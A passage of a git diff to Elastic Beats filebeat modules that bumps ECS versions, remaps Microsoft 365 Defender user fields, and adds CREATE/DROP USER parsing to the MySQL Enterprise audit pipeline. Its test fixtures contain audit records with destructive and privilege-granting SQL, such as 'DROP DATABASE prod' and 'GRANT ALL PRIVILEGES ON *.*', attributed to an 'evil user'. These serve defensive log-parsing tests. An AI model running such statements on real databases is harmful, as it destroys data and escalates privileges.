"threat.technique.name": "DefenseEvasion", + "user.domain": "TestServer4", + "user.name": "administrator1" }, { "cloud.account.id": "43521344-d66c-4c7e-9e30-40034eb7c6f3", @@ -176,7 +178,10 @@ "forwarded" ], "threat.framework": "MITRE ATT&CK", - "threat.technique.name": "DefenseEvasion" + "threat.technique.name": "DefenseEvasion", + "user.domain": "TestServer4", + "user.id": "S-1-5-21-46152456-1367606905-4031241297-500", + "user.name": "administrator1" }, { "cloud.account.id": "1234543-d66c-4c7e-9e30-40034eb7c6f3", diff --git a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml index 2d6d418b4d9a..0e77cbdf4917 100644 --- a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml +++ b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml index 4f07ff46be28..52ebe56c3b19 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml @@ -54,4 +54,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml b/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml index f1ea7c03abd6..ae33c77d6d5e 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml @@ -227,17 +227,34 @@ processors: ###################### - rename: field: json.alerts.entities.userPrincipalName - target_field: host.user.name + target_field: user.name ignore_missing: true - rename: field: json.alerts.entities.domainName - target_field: host.user.domain + target_field: user.domain ignore_missing: true - rename: field: json.alerts.entities.aadUserId - target_field: host.user.id + target_field: user.id ignore_missing: true +############################## +## ECS host.user Mapping ## +## Deprecated since ECS 1.8 ## +############################## +- set: + field: host.user.name + value: '{{user.name}}' + ignore_empty_value: true +- set: + field: host.user.domain + value: '{{user.domain}}' + ignore_empty_value: true +- set: + field: host.user.id + value: '{{user.id}}' + ignore_empty_value: true + ######################### ## ECS Related Mapping ## ######################### @@ -247,8 +264,8 @@ processors: if: ctx.json?.entities?.ipAddress != null - append: field: related.user - value: '{{host.user.name}}' - if: ctx.host?.user?.name != null + value: '{{user.name}}' + if: ctx.user?.name != null - append: field: related.hash value: '{{file.hash.sha1}}' diff --git a/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json b/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json index 1f81a57a98fc..edd4b8ad091d 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json +++ b/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json @@ -556,7 +556,9 @@ "forwarded" ], "threat.framework": "MITRE ATT&CK", - "threat.technique.name": "SuspiciousActivity" + "threat.technique.name": "SuspiciousActivity", + "user.id": "8e24c50a-a77c-4782-813f-965009b5ddf3", + "user.name": "brent@elasticbv.onmicrosoft.com" }, { "@timestamp": "2020-09-23T19:32:05.8366667Z", diff --git a/x-pack/filebeat/module/misp/threat/config/input.yml b/x-pack/filebeat/module/misp/threat/config/input.yml index 81deb7e5aa5e..488f0a249c02 100644 --- a/x-pack/filebeat/module/misp/threat/config/input.yml +++ b/x-pack/filebeat/module/misp/threat/config/input.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/mssql/log/config/config.yml b/x-pack/filebeat/module/mssql/log/config/config.yml index 085cd033b37f..d908ffc950b9 100644 --- a/x-pack/filebeat/module/mssql/log/config/config.yml +++ b/x-pack/filebeat/module/mssql/log/config/config.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml index ec1ee8b09035..c62863d5ac80 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml +++ b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml b/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml index c9ec7375e71b..c0bb73d049e5 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml +++ b/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml @@ -23,7 +23,7 @@ processors: - append: field: event.category value: iam - if: '["create_user", "delete_user", "grant", "flush_privileges"].contains(ctx.mysqlenterprise.audit?.general_data?.sql_command)' + if: '["create_user", "delete_user", "drop_user", "grant", "flush_privileges"].contains(ctx.mysqlenterprise.audit?.general_data?.sql_command)' - append: field: event.type value: access @@ -128,6 +128,38 @@ processors: if (ctx.process.args.length > 0) { ctx.process.executable = ctx.process.args[0]; } +# Query parsing +- grok: + field: mysqlenterprise.audit.general_data.query + if: '["create_user", "delete_user", "drop_user"].contains(ctx.mysqlenterprise?.audit?.general_data?.sql_command)' + ignore_failure: true + patterns: + - '(?i)(?:CREATE|DROP)\s+USER(?:\s+IF\s+(?:NOT\s+)?EXISTS)?\s+(?:%{START_QUOTE}%{QUOTED:user.target.name}%{END_QUOTE}|%{UNQUOTED:user.target.name})(?:@(?:%{START_QUOTE}%{QUOTED:user.target.domain}%{END_QUOTE}|%{UNQUOTED:user.target.domain}))?' + pattern_definitions: + START_QUOTE: (?<__quote>['"`]) + QUOTED: (?~\k<__quote>) + END_QUOTE: (?:\k<__quote>) + UNQUOTED: (?:[^\s@;]*+) +- remove: + field: __quote + ignore_missing: true +- set: + field: user.name + value: '{{server.user.name}}' + ignore_empty_value: true + if: 'ctx.user?.target != null' +- append: + field: event.type + value: + - user + - creation + if: 'ctx.mysqlenterprise?.audit?.general_data?.sql_command == "create_user"' +- append: + field: event.type + value: + - user + - deletion + if: 'ctx.mysqlenterprise?.audit?.general_data?.sql_command == "drop_user" || ctx.mysqlenterprise?.audit?.general_data?.sql_command == "delete_user"' # Attributes starting with _ is only supported by MySQL 8.0.19 and above. - convert: @@ -138,23 +170,39 @@ processors: - append: field: related.user value: '{{server.user.name}}' + allow_duplicates: false if: ctx?.server?.user?.name != null - append: field: related.user value: '{{client.user.name}}' + allow_duplicates: false if: ctx?.client?.user?.name != null +- append: + field: related.user + value: '{{user.target.name}}' + allow_duplicates: false + if: ctx?.user?.target?.name != null - append: field: related.ip value: '{{client.ip}}' + allow_duplicates: false if: ctx?.client?.ip != null +- append: + field: related.hosts + value: '{{client.domain}}' + allow_duplicates: false + if: ctx?.client?.domain != null - date: field: mysqlenterprise.audit.timestamp formats: - yyyy-MM-dd HH:mm:ss if: ctx?.mysqlenterprise?.audit?.timestamp != null +- rename: + field: message + target_field: event.original + ignore_missing: true - remove: field: - - message - mysqlenterprise.audit.event - mysqlenterprise.audit.timestamp - mysqlenterprise.audit.connection_data.connection_attributes._pid diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log index 2bf3e31f37b9..79e8ac2cd218 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log +++ b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log @@ -9,7 +9,7 @@ { "timestamp": "2020-10-19 19:28:27", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'root'@'hades.home' IDENTIFIED BY 'password'", "status": 1064 } }, { "timestamp": "2020-10-19 19:28:54", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'", "status": 1410 } }, { "timestamp": "2020-10-19 19:29:36", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "CREATE USER 'audit_test_user'@'localhost' IDENTIFIED BY ", "status": 1396 } }, -{ "timestamp": "2020-10-19 19:30:00", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "CREATE USER 'audit_test_user2'@'hades.home' IDENTIFIED BY ", "status": 0 } }, +{ "timestamp": "2020-10-19 19:30:00", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "CREATE USER IF NOT EXISTS 'audit_test_user2'@'hades.home' IDENTIFIED BY ", "status": 0 } }, { "timestamp": "2020-10-19 19:30:18", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO ‘audit_test_user2’@’hades.home’", "status": 1410 } }, { "timestamp": "2020-10-19 19:30:32", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'", "status": 1410 } }, { "timestamp": "2020-10-19 19:30:49", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'", "status": 1410 } }, @@ -29,3 +29,6 @@ { "timestamp": "2020-10-19 19:32:10", "id": 0, "class": "connection", "event": "disconnect", "connection_id": 16, "account": { "user": "audit_test_user2", "host": "hades.home" }, "login": { "user": "audit_test_user2", "os": "", "ip": "192.168.2.5", "proxy": "" }, "connection_data": { "connection_type": "ssl" } }, { "timestamp": "2020-10-19 19:32:12", "id": 0, "class": "connection", "event": "disconnect", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "connection_data": { "connection_type": "socket" } }, { "timestamp": "2020-10-19 19:32:16", "id": 0, "class": "audit", "event": "shutdown", "connection_id": 0, "shutdown_data": { "server_id": 1 } } +{ "timestamp": "2021-02-10 19:05:42", "id": 2, "class": "audit", "event": "status", "connection_id": 42, "account": { "user": "adrian", "host": "elastic" }, "login": { "user": "adrian", "os": "", "ip": "192.168.7.76", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "crEAtE uSeR 'evil user'@elastic IDENTIFIED BY ", "status": 1396 } }, +{ "timestamp": "2021-02-10 19:05:42", "id": 2, "class": "audit", "event": "status", "connection_id": 42, "account": { "user": "adrian", "host": "elastic" }, "login": { "user": "evil user", "os": "", "ip": "192.168.7.76", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "drop_db", "query": "DROP DATABASE prod", "status": 1396 } }, +{ "timestamp": "2021-02-10 19:05:42", "id": 2, "class": "audit", "event": "status", "connection_id": 42, "account": { "user": "adrian", "host": "elastic" }, "login": { "user": "evil user", "os": "", "ip": "192.168.7.76", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "drop_user", "query": "DrOp usEr IF EXISTS 'evil user'@%", "status": 1396 } }, diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json index 48e4c2fa161f..e563f918ac73 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json +++ b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json @@ -8,6 +8,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:21:33\", \"id\": 0, \"class\": \"audit\", \"event\": \"startup\", \"connection_id\": 0, \"account\": { \"user\": \"skip-grants user\", \"host\": \"\" }, \"login\": { \"user\": \"\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"startup_data\": { \"server_id\": 1, \"os_version\": \"x86_64-Linux\", \"mysql_version\": \"8.0.22-commercial\", \"args\": [\"/usr/local/mysql/bin/mysqld\", \"--loose-audit-log-format=JSON\", \"--log-error=log.err\", \"--pid-file=mysqld.pid\", \"--port=3306\" ] } },", "event.outcome": "unknown", "event.timezone": "-02:00", "fileset.name": "audit", @@ -50,6 +51,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:25:51\", \"id\": 0, \"class\": \"connection\", \"event\": \"connect\", \"connection_id\": 13, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\", \"status\": 0, \"db\": \"\", \"connection_attributes\": { \"_pid\": \"33038\", \"_platform\": \"x86_64\", \"_os\": \"Linux\", \"_client_name\": \"libmysql\", \"os_user\": \"root\", \"_client_version\": \"8.0.22\" } } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -73,6 +75,9 @@ "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", "process.pid": 33038, + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -92,6 +97,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:25:51\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 13, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select @@version_comment limit 1\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -110,6 +116,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -129,6 +138,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:25:52\", \"id\": 0, \"class\": \"connection\", \"event\": \"disconnect\", \"connection_id\": 13, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -145,6 +155,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -165,6 +178,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:27:45\", \"id\": 0, \"class\": \"connection\", \"event\": \"connect\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\", \"status\": 0, \"db\": \"\", \"connection_attributes\": { \"_pid\": \"33197\", \"_platform\": \"x86_64\", \"_os\": \"Linux\", \"_client_name\": \"libmysql\", \"os_user\": \"root\", \"_client_version\": \"8.0.22\" } } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -188,6 +202,9 @@ "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", "process.pid": 33197, + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -207,6 +224,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:27:45\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select @@version_comment limit 1\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -225,6 +243,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -245,6 +266,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:27:50\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'password'\", \"status\": 1064 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -263,6 +285,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -283,6 +308,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:28:04\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'password'\", \"status\": 1064 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -301,6 +327,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -321,6 +350,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:28:27\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'hades.home' IDENTIFIED BY 'password'\", \"status\": 1064 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -339,6 +369,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -359,6 +392,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:28:54\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -377,6 +411,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -397,11 +434,14 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:29:36\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_user\", \"query\": \"CREATE USER 'audit_test_user'@'localhost' IDENTIFIED BY \", \"status\": 1396 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ "access", - "connection" + "connection", + "user", + "creation" ], "fileset.name": "audit", "input.type": "log", @@ -415,14 +455,21 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ - "root" + "root", + "audit_test_user" ], "server.user.name": "root", "service.type": "mysqlenterprise", "tags": [ "mysqlenterprise-audit" - ] + ], + "user.name": "root", + "user.target.domain": "localhost", + "user.target.name": "audit_test_user" }, { "@timestamp": "2020-10-19T19:30:00.000Z", @@ -435,11 +482,14 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:00\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_user\", \"query\": \"CREATE USER IF NOT EXISTS 'audit_test_user2'@'hades.home' IDENTIFIED BY \", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ "access", - "connection" + "connection", + "user", + "creation" ], "fileset.name": "audit", "input.type": "log", @@ -447,20 +497,27 @@ "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", - "mysqlenterprise.audit.general_data.query": "CREATE USER 'audit_test_user2'@'hades.home' IDENTIFIED BY ", + "mysqlenterprise.audit.general_data.query": "CREATE USER IF NOT EXISTS 'audit_test_user2'@'hades.home' IDENTIFIED BY ", "mysqlenterprise.audit.general_data.sql_command": "create_user", "mysqlenterprise.audit.general_data.status": 0, "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ - "root" + "root", + "audit_test_user2" ], "server.user.name": "root", "service.type": "mysqlenterprise", "tags": [ "mysqlenterprise-audit" - ] + ], + "user.name": "root", + "user.target.domain": "hades.home", + "user.target.name": "audit_test_user2" }, { "@timestamp": "2020-10-19T19:30:18.000Z", @@ -473,6 +530,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:18\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO \u2018audit_test_user2\u2019@\u2019hades.home\u2019\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -481,7 +539,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 4645, + "log.offset": 4659, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -491,6 +549,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -511,6 +572,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:32\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -519,7 +581,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 5031, + "log.offset": 5045, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -529,6 +591,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -549,6 +614,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:49\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -557,7 +623,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 5408, + "log.offset": 5422, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -567,6 +633,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -587,6 +656,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:01\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user2'@'hades.home'\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -595,7 +665,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 5785, + "log.offset": 5799, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -605,6 +675,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -626,6 +699,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:25\", \"id\": 0, \"class\": \"connection\", \"event\": \"connect\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"ssl\", \"status\": 0, \"db\": \"\", \"connection_attributes\": { \"_os\": \"Linux\", \"_client_name\": \"libmysql\", \"_pid\": \"394499\", \"_client_version\": \"5.7.30\", \"_platform\": \"x86_64\" } } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -635,7 +709,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 6160, + "log.offset": 6174, "mysqlenterprise.audit.class": "connection", "mysqlenterprise.audit.connection_data.connection_attributes._client_name": "libmysql", "mysqlenterprise.audit.connection_data.connection_attributes._client_version": "5.7.30", @@ -648,6 +722,9 @@ "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", "process.pid": 394499, + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -671,6 